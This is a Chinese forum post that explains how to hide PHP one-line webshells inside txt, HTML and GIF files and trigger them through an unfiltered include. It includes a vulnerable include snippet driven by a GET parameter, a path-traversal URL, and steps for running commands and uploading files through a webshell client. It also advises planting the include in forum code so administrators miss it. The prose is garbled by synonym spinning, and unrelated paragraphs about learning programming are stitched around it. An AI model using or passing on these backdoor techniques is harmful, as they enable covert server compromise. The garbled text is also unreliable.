|
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
基础这个东西是个比较笼统的概念,如果你之前学习过c语言, c语言被认为是 比来良多伴侣都在问我是不是能把我那一句话木马埋没到HTML或图片里,其实把一句话木马拔出到PHP文件中就已很荫蔽了,假如说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试呈报吧。要晓得假如光把PHP语句放到图片里是不管若何也不克不及履行的,由于PHP只解析扩大名为php的文件。所以说要能使埋没在图片里的PHP语句履行。咱们就的借助PHP中的挪用函数 :include 、require 等。
ASP中语句看似十分荫蔽但直接挪用图片对略微懂点PHP的人就不难发明可疑的地方。因为URL 里用GET体例很难传递参数,这就使得拔出木马的功能得不到发扬。
Include 函数在PHP中利用的对照频仍,所以引发的平安成绩也其实太多,例如PHPWIND1.36的破绽就是由于include前面的变量没做过滤引发的。由此咱们就能够机关相似的语句来拔出到PHP文件中。然后把木马埋没到图片或HTML文件里,可以说荫蔽性就更高了。如在PHPWIND服装论坛里拔出上面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? > 普通办理员是没法看出来的。
有了include 函数来帮助协助咱们就能够把PHP木马埋没到 诸如 txt、html和图片文件等良多类型的文件里来了。由于txt、html和图片文件这三品种型的文件最不管在服装论坛仍是文章体系里是最为罕见的了,上面咱们就顺次来做测试。
起首创立一PHP文件test.php 文件内容为:
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件普通都是申明文件,所以咱们把一句话木马放到目次的申明文件里就OK了。随意创立一个TXT文件t.txt。咱们把一句话木马粘贴到t.txt文件里。然后会见 http://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后食客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt 暗码里添入cmd就能够了,履行前往的了局都可以看到。
关于HTML的文件,普通都为模版文件。为了使拔出到HTML的文件的木马能被挪用履行并且不被显示出来,咱们可以在HTML里到场一个埋没属性的文本框 ,如: 然后利用办法同上。履行的前往了局普通都可以检查源文件看到。 如利用检查本法式目次功效。检查源文件内容为 我可以失掉目次为 C:\Uniserver2_7s\www\test。
上面咱们说说图片文件,要说最为毒的一招莫过于把木马埋没到图片里。咱们可以直接对一个图片停止编纂,把拔出到图片末尾
经测试普通都不会对图片形成影响。然后一样办法客户端木马地址添入
咱们检查PHP情况变量 前往的是了局是原图片。
这里能够要和咱们想象的了局有些差距了,其实号令已运转了,只是前往的了局看不到罢了,由于这是真实的GIF文件,所所以不会显示前往了局的,为了证实是不是真的履行了号令咱们 履行上传文件号令。果不出所料,文件已胜利上传到办事器上。如许捏造的长处是荫蔽性好。弱点也天然不必说了是没回显。假如你想看到前往的了局,那就拿出记事本捏造一个假的图片文件吧。
到这里就根基测试完了,如何荫蔽PHP后门就看你本人的选择了。行文仓皇,若有不当的地方,请指出!
可以说你的马步已经扎的差不多了,接下来就要开始练把势的时候了,如果有条件的话,用笔或者打印一个简易的PHP手册在身上,时不时的摸出来看看,记得,去WC也不能放过(^2^)。 |
|
|Archiver|手机版|仓酷云
鄂ICP备14007578号-2
发表于 2015-2-3 23:53:32
收藏
转播
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜